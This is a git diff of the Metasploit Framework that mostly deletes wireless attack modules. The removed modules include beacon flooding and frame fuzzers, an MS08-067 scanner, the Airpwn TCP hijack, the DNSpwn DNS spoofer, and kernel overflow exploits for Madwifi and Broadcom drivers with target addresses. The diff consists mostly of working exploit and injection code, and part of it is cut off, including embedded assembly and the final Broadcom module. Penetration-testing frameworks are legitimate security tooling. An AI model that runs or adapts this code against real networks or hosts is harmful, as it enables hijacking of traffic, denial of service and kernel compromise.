end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) + # capabilities - [0, 0].pack('CC') # Type=SSID(0) Length=0 - - return frame - - end -end diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb deleted file mode 100644 index 66fad3d770..0000000000 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ /dev/null @@ -1,108 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Beacon SSID Emulator', - 'Description' => %q{ - This module sends out beacon frames using SSID's identified in a - specified file and randomly selected BSSID's. This is useful when - combined with a Karmetasploit attack to get clients configured to - not probe for networks in their PNL to start probing when they see a - matching SSID in from this script. For a list of common SSID's to - use with this script, check http://www.wigle.net/gps/gps/main/ssidstats. - If a file of SSID's is not specified, a default list of 20 SSID's will - be used. This script will run indefinitely until interrupted. - }, - - 'Author' => [ 'joswr1ght', 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('SSIDS_FILE', [ false, "Filename of SSID's to broadcast, one per line"]) - ], self.class) - end - - - def run - - @@uni = 0 - - frames = [] - - open_wifi - - ssidlist = [] - if datastore['SSIDS_FILE'] - begin - ssidfile = File.new(datastore['SSIDS_FILE'], "r") - rescue ::Exception - print_status("Couldn't read from \"#{datastore['SSIDS_FILE']}\": #{$!}") - return - end - ssidfile.each_line do |line| - ssidlist.push line.chomp - end - else - ssidlist = ["linksys", "default", "NETGEAR", "Belkin54g", "Wireless", - "WLAN", "home", "DLINK", "smc", "tsunami", "tmobile", "101", "panera", - "hhonors", "GlobalSuiteWireless", "Internet", "WiFi", "public", "guest", - "test"] - end - - print_status("Sending beacon frames...") - - while (true) - ssidlist.each do |ssid| - #print_status("Sending frame for SSID #{ssid}") - frame = create_frame(ssid) - wifi.write(frame) - end - end - end - - - def create_frame(ssid) - mtu = 1500 # 2312 # 1514 - ies = rand(1024) - - bssid = "0" + ssid[0..4] - seq = [rand(255)].pack('n') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x04\x01" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr - - return frame - - end -end diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb deleted file mode 100644 index b6bc822bfb..0000000000 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ /dev/null @@ -1,33 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Test Module', - 'Description' => %q{ - This module is a test of the wireless packet injection system. - Please see external/ruby-lorcon/README for more information. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - end - - def run - open_wifi - wifi.write("X" * 1000) - end - -end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb deleted file mode 100644 index a31e89b589..0000000000 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ /dev/null @@ -1,127 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Beacon Frame Fuzzer', - 'Description' => %q{ - This module sends out corrupted beacon frames. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) - end - - def ping_check - 1.upto(3) do |i| - x = `ping -c 1 -n #{datastore['PING_HOST']}` - return true if x =~ /1 received/ - if (i > 1) - print_status("Host missed a ping response...") - end - end - return false - end - - def run - - srand(0) - - @@uni = 0 - - frames = [] - - open_wifi - - print_status("Sending corrupt frames...") - - while (true) - frame = create_frame() - - if (datastore['PING_HOST']) - - if (frames.length >= 5) - frames.shift - frames.push(frame) - else - frames.push(frame) - end - - 1.upto(3) do - wifi.write(frame) - if (not ping_check()) - frames.each do |f| - print_status "****************************************" - print_status f.inspect - end - return - end - end - else - wifi.write(frame) - end - end - end - - - def create_frame - mtu = 1500 # 2312 # 1514 - ies = rand(1024) - - ssid = Rex::Text.rand_text_alphanumeric(rand(256)) - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - #"\x00\x05" + # capability flags - Rex::Text.rand_text(2) + - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr - - 1.upto(ies) do |i| - max = mtu - frame.length - break if max < 2 - t = rand(256) - l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) - d = Rex::Text.rand_text(l) - frame += t.chr + l.chr + d - end - - return frame - - end - -end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb deleted file mode 100644 index 114fc89c4a..0000000000 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ /dev/null @@ -1,126 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Probe Response Frame Fuzzer', - 'Description' => %q{ - This module sends out corrupted probe response frames. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) - end - - def ping_check - 1.upto(3) do |i| - x = `ping -c 1 -n #{datastore['PING_HOST']}` - return true if x =~ /1 received/ - if (i > 1) - print_status("Host missed a ping response...") - end - end - return false - end - - def run - - srand(0) - - @@uni = 0 - - frames = [] - - open_wifi - - print_status("Sending corrupt frames...") - - while (true) - frame = create_frame() - - if (datastore['PING_HOST']) - - if (frames.length >= 5) - frames.shift - frames.push(frame) - else - frames.push(frame) - end - - 1.upto(10) do - wifi.write(frame) - if (not ping_check()) - frames.each do |f| - print_status "****************************************" - print_status f.inspect - end - return - end - end - else - wifi.write(frame) - end - end - end - - def create_frame - mtu = 500 - ies = rand(1024) - - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capability flags - - ssid = Rex::Text.rand_text_alphanumeric(rand(256)) - - # ssid tag - frame << "\x00" + ssid.length.chr + ssid - - # supported rates - frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" - - # current channel - frame << "\x03" + "\x01" + channel.chr - - 1.upto(ies) do |i| - max = mtu - frame.length - break if max < 2 - t = rand(256) - l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) - d = Rex::Text.rand_text(l) - frame += t.chr + l.chr + d - end - - return frame - - end - -end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index 979cac2ad8..3944373f8f 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved from") + vprint_error("#{peer} - No content retrieved") return end diff --git a/modules/auxiliary/scanner/smb/ms08_067_check.rb b/modules/auxiliary/scanner/smb/ms08_067_check.rb deleted file mode 100644 index 34eb524d3a..0000000000 --- a/modules/auxiliary/scanner/smb/ms08_067_check.rb +++ /dev/null @@ -1,120 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require "msf/core" -require 'msf/core/module/deprecated' - -class Metasploit4 < Msf::Auxiliary - - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - include Msf::Module::Deprecated - deprecated Date.new(2014, 2, 26), "exploit/windows/smb/ms08_067_netapi" - - def initialize(info = {}) - super(update_info(info, - 'Name' => "MS08-067 Scanner", - 'Description' => %q{ - This module uses the check in ms08_067_netapi to scan for MS08-067. - }, - 'Author' => [ - "hdm", # with tons of input/help/testing from the community - "Brett Moore ", - "frank2 ", # check() detection - "jduck", # XP SP2/SP3 AlwaysOn DEP bypass - "sho-luv", # Original module - "wvu" # Refactor and cleanup - ], - 'References' => [ - ["CVE", "2008-4250"], - ["OSVDB", "49243"], - ["MSB", "MS08-067"], - # If this vulnerability is found, ms08-67 is exposed as well - ["URL", "http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"] - ], - 'License' => MSF_LICENSE - )) - - register_options([ - OptString.new("SMBPIPE", [true, "The pipe name to use (BROWSER, SRVSVC)", "BROWSER"]) - ], self.class) - end - - def run_host(ip) - case check_vuln - when Msf::Exploit::CheckCode::Vulnerable - print_good("#{ip}:#{rport} - MS08-067 VULNERABLE") - report_vuln({ - :host => ip, - :name => "MS08-067", - :info => "Vulnerability in Server service could allow remote code execution", - :refs => self.references - }) - when Msf::Exploit::CheckCode::Safe - vprint_status("#{ip}:#{rport} - MS08-067 SAFE") - when Msf::Exploit::CheckCode::Unknown - vprint_status("#{ip}:#{rport} - MS08-067 UNKNOWN") - end - end - - def check_vuln - begin - connect() - smb_login() - rescue Rex::Proto::SMB::Exceptions::LoginError - return Msf::Exploit::CheckCode::Unknown - end - - # - # Build the malicious path name - # 5b878ae7 "db @eax;g" - prefix = "\\" - path = - "\x00\\\x00/"*0x10 + - Rex::Text.to_unicode("\\") + - Rex::Text.to_unicode("R7") + - Rex::Text.to_unicode("\\..\\..\\") + - Rex::Text.to_unicode("R7") + - "\x00"*2 - - server = Rex::Text.rand_text_alpha(rand(8)+1).upcase - - handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', - 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] - ) - - begin - # Samba doesn't have this handle and returns an ErrorCode - dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode - return Msf::Exploit::CheckCode::Safe - end - - stub = - NDR.uwstring(server) + - NDR.UnicodeConformantVaryingStringPreBuilt(path) + - NDR.long(8) + - NDR.wstring(prefix) + - NDR.long(4097) + - NDR.long(0) - - resp = dcerpc.call(0x1f, stub) - error = resp[4,4].unpack("V")[0] - - # Cleanup - simple.client.close - simple.client.tree_disconnect - disconnect - - if (error == 0x0052005c) # \R :) - return Msf::Exploit::CheckCode::Vulnerable - else - return Msf::Exploit::CheckCode::Safe - end - end - -end diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb deleted file mode 100644 index 6d18979193..0000000000 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ /dev/null @@ -1,194 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'yaml' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'Airpwn TCP Hijack', - 'Description' => %q{ - TCP streams are 'protected' only in so much as the sequence - number is not guessable. - - Wifi is shared media. - - Got your nose. - - Responses which do not begin with Header: Value assumed to be - HTML only and will have Header:Value data prepended. Responses - which do not include a Content-Length header will have one generated. - }, - 'Author' => ['toast', 'dragorn', 'ddz', 'hdm'], - 'License' => MSF_LICENSE, - 'Actions' => - [ - [ 'Airpwn' ] - ], - 'PassiveActions' => - [ - 'Capture' - ], - 'DefaultAction' => 'Airpwn' - ) - - register_options( - [ - OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement", - File.join(Msf::Config.data_directory, "exploits", "wifi", "airpwn", "sitelist.yml") - ]), - OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]), - OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]), - OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]), - OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]), - ], self.class) - end - - def run - - @sitelist = datastore['SITELIST'] - @regex = datastore['MATCH'] - @response = datastore['RESPONSE'] - @filter = datastore['FILTER'] - @useyaml = datastore['USESITEFILE'] - - @http = [] - - if @useyaml then - begin - @http = YAML::load_file(@sitelist) - - rescue ::Exception => e - print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}" - end - else - @http[0] = { "regex" => [@regex], "response" => @response } - end - - @run = true - - print_status "AIRPWN: Parsing responses and defining headers" - - # Prep the responses - @http.each do |r| - if not r["response"] then - if not r["file"] then - print_error "AIRPWN: Missing 'response' or 'file' in yaml config" - r["txresponse"] = "" - else - r["txresponse"] = "" - begin - File.open(r["file"], "rb") do |io| - r["txresponse"] += io.read(4096) - end - rescue EOFError - rescue ::Exception => e - print_error("AIRPWN: failed to parse response file " + - "#{r['file']}, #{e.class} #{e} #{e.backtrace}") - end - end - else - if r["file"] then - print_error "AIRPWN: Both 'response' and 'file' in yaml config, " + - "defaulting to 'response'" - end - - r["txresponse"] = r["response"] - end - - # If we have headers - if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0 - # But not a content-length - if r["txresponse"].scan(/^Content-Length: /).size == 0 - # Figure out the length and add it - loc = (/\n\n/m =~ r["txresponse"]) - if loc == nil - print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is." - else - print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one." - r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s) - end - end - else - # We have no headers, generate a response - print_status "AIRPWN: Response packet has no HTTP headers, creating some." - r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size]) - end - end - - print_status "Opening wifi module." - open_wifi - - self.wifi.filter = @filter if (@filter != "") - each_packet do |pkt| - - d3 = pkt.dot3 - - next if not d3 - p = PacketFu::Packet.parse(d3) rescue nil - next unless p.is_tcp? - - @http.each do |r| - hit = nil - r['regex'].each do |reg| - hit = p.payload.scan(/#{reg}/) || nil - break if hit.size != 0 - end - next if hit.size.zero? - - print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq]) - - injpkt = Lorcon::Packet.new() - injpkt.bssid = pkt.bssid - - response_pkt = PacketFu::TCPPacket.new - response_pkt.eth_daddr = p.eth_saddr - response_pkt.eth_saddr = p.eth_daddr - response_pkt.ip_saddr = p.ip_daddr - response_pkt.ip_daddr = p.ip_saddr - response_pkt.ip_ttl = p.ip_ttl - response_pkt.tcp_sport = p.tcp_dport - response_pkt.tcp_dport = p.tcp_sport - response_pkt.tcp_win = p.tcp_win - response_pkt.tcp_seq = p.tcp_ack - response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff - response_pkt.tcp_flags.ack = 1 - response_pkt.tcp_flags.psh = 1 - response_pkt.payload = r["txresponse"] - response_pkt.recalc - injpkt.dot3 = response_pkt.to_s - - case pkt.direction - when ::Lorcon::Packet::LORCON_FROM_DS - injpkt.direction = Lorcon::Packet::LORCON_TO_DS - when ::Lorcon::Packet::LORCON_TO_DS - injpkt.direction = Lorcon::Packet::LORCON_FROM_DS - else - injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS - end - - self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) - - response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size - response_pkt.tcp_flags.ack = 1 - response_pkt.tcp_flags.psh = 0 - response_pkt.tcp_flags.fin = 1 - response_pkt.payload = 0 - response_pkt.recalc - - injpkt.dot3 = response_pkt.to_s - self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) - end - end - - end - -end diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb deleted file mode 100644 index e0699f90c1..0000000000 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ /dev/null @@ -1,120 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'yaml' -require 'net/dns/packet' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'DNSpwn DNS Hijack', - 'Description' => %q{ - Race DNS responses and replace DNS queries - }, - 'Author' => ['dragorn'], - 'License' => MSF_LICENSE - ) - - register_options( - [ - OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement", - File.join(Msf::Config.data_directory, "exploits", "wifi", "dnspwn", "dnslist.yml") - ]), - OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]), - OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]), - OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]), - OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]), - OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]), - ], self.class) - end - - def run - - @dnslist = datastore['DNSLIST'] - @regex = datastore['MATCH'] - @response = datastore['IP'] - @filter = datastore['FILTER'] - @duration = datastore['DURATION'] - @useyaml = datastore['USEDNSFILE'] - - @dns = [] - - if @useyaml - begin - @dns = YAML::load_file(@dnslist) - rescue ::Exception => e - print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}" - end - else - @dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration } - end - - @run = true - - open_wifi - - self.wifi.filter = @filter if not @filter.empty? - each_packet do |pkt| - d3 = pkt.dot3 - - next if not d3 - p = PacketFu::Packet.parse(d3) rescue nil - next unless p.is_udp? - - dns = Net::DNS::Packet::parse(p.payload) rescue nil - next unless dns - - next if dns.answer.size != 0 - next if dns.question.size == 0 - - @dns.each do |r| - hit = nil - r['regex'].each do |reg| - hit = dns.question[0].qName.scan(/#{reg}/) || nil - break if hit.size != 0 - end - next if hit.size.zero? - - print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ]) - - injpkt = Lorcon::Packet.new() - injpkt.bssid = pkt.bssid - - response_pkt = PacketFu::UDPPacket.new - response_pkt.eth_daddr = p.eth_saddr - response_pkt.eth_saddr = p.eth_daddr - response_pkt.ip_saddr = p.ip_daddr - response_pkt.ip_daddr = p.ip_saddr - response_pkt.ip_ttl = p.ip_ttl - response_pkt.udp_sport = p.udp_dport - response_pkt.udp_dport = p.udp_sport - - dns.header.qr = 1 - dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"]) - - response_pkt.payload = dns.data - response_pkt.recalc - - injpkt.dot3 = response_pkt.to_s - - if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS) - injpkt.direction = Lorcon::Packet::LORCON_TO_DS - elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS) - injpkt.direction = Lorcon::Packet::LORCON_FROM_DS - else - injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS - end - - self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error) - end - end - end -end diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb deleted file mode 100644 index f75f54a916..0000000000 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ /dev/null @@ -1,378 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -# Madwifi remote kernel exploit -# 100% reliable, doesn't crash wifi stack, can exploit -# same target multiple times -# -# Julien TINNES -# Laurent BUTTI <0x9090 at gmail.com> -# -# vuln in giwscan_cb, here's the path: -# -# ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb -# - -require 'msf/core' -require 'metasm' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Lorcon2 - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow', - 'Description' => %q{ - The Madwifi driver under Linux is vulnerable to a remote kernel-mode - stack-based buffer overflow. - - The vulnerability is triggered by one of these properly crafted - information element: WPA, RSN, WME and Atheros OUI Current madwifi - driver (0.9.2) and and all madwifi-ng drivers since r1504 are - vulnerable - - Madwifi 0.9.2.1 release corrects the issue. - - This module has been tested against Ubuntu 6.10 and is 100% reliable, - doesn\'t crash the Wifi stack and can exploit the same machine multiple - time without the need to reboot it. - - This module depends on the Lorcon2 library and only works on the Linux - platform with a supported wireless card. Please see the Ruby Lorcon2 - documentation (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'Julien Tinnes ', - 'Laurent Butti <0x9090 at gmail.com>' - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-6332'], - ['OSVDB', '31267'], - ['URL', 'http://www.madwifi.org'] - ], - #'Stance' => Msf::Exploit::Stance::Passive, - 'Platform' => 'linux', - 'Arch' => [ ARCH_X86 ], - 'Payload' => - { - #'Space' => 65, - # Metasploit doesn't support dynamic size payloads - # so we will handle this in metasm instead and ask for - # the smaller payload possible - #'Encoder' => Msf::Encoder::Type::Raw, - 'DisableNops' => true - }, - 'Targets' => - [ - [ 'Ubuntu 6.10', - { - 'JMPESP' => 0xffffe777, - 'scan_iterate_ra' => "0x8014401" - } - ], - - [ 'Generic (you need non randomized vdso)', - { - 'JMPESP' => 0xffffe777, - 'scan_iterate_ra' => nil - } - ] - ], - 'DisclosureDate' => 'Dec 08 2006' - )) - - register_options( - [ - OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']), - OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]), - OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']), - ], self.class) - end - - def exploit - open_wifi - - #puts "kikoo " + payload.encoded.inspect - #puts payload.encoded.to_s.unpack('C*').map { |i| i.to_s 16 }.join(',') - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Shellcode size is: #{payload.encoded.length} bytes") - print_status("Creating malicious beacon frame...") - - frame = create_beacon() - - print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...") - - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - break if session_created? and datastore['SINGLESHOT'] - end - - print_status("Completed sending #{count} beacons.") - end - - - def create_beacon - - ssid = datastore['SSID'].to_s - bssid = Rex::Text.rand_text(6) - channel = datastore['CHANNEL'].to_i - len = datastore['LENGTH'].to_i - seq = [rand(255)].pack('n') - jmpesp = target['JMPESP'] # jmp esp in vdso - - # address just after the call (in ieee80211_scan_iterate in wlan.ko) - scan_iterate_ra=target['scan_iterate_ra'] - - if scan_iterate_ra - howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent - else - howtoreturn = "RETURN_BADLY" # Return to userland with IRET - end - - bssiwlist = 0x0804ddd0 - - stacksize = "STACK_8K" - getregs = "CALCULATE" - #getregs = "IWANTTOSCANMANUALLY" - reg_cs = "0x73" - reg_ss = "0x7b" - - wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) - - #puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') - - if (len == 24 and value.length != 198) - fail_with(Failure::BadConfig, "Value is too big! #{value.length}") - end - - buf = "\xdd" + value.length.chr + value - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x01\x00" + # capabilities - - # ssid IE - "\x00" + ssid.length.chr + ssid + - - # supported rates IE - "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # channel IE - "\x03" + "\x01" + channel.chr + - - # invalid wpa IE buffer overflow - # wpa ie is an example, still valid for other IEs - buf - - return frame - end - -end diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 27350a62ca..86be4d034d 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", 'Description' => %q{ This module exploits an use after free condition on Internet Explorer as used in the wild - on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to - bypass ASLR and finally DEP. + as part of "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to + bypass ASLR and DEP. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb deleted file mode 100644 index cd79410a86..0000000000 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ /dev/null @@ -1,199 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan - 'skape', # windows kernel ninjitsu and debugging - 'hdm' # porting the C version to ruby - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-5882'], - ['OSVDB', '30294'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500 - }, - 'Platform' => 'win', - 'Targets' => - [ - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 